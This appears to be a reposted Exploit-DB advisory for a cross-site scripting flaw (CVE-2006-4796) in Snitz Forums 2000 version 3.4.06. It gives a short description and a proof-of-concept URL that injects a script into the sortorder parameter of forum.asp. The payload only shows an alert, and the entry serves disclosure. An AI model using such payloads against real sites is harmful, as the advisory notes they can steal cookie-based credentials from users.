- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 28566
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2006-4796
- Дата публикации
- 2006-09-13
Код:
source: https://www.securityfocus.com/bid/20004/info
Snitz Forums 2000 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
This could allow an attacker to steal cookie-based authentication credentials and launch other attacks.
Version 3.4.06 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/forum.asp?FORUM_ID=1&ARCHIVE=true&sortfield=lastpost&sortorder="><script>function%20xssbaslat(){alert("Xss%20Here");}</script><body%20onload="xssbaslat()"> etc..
- Источник
- www.exploit-db.com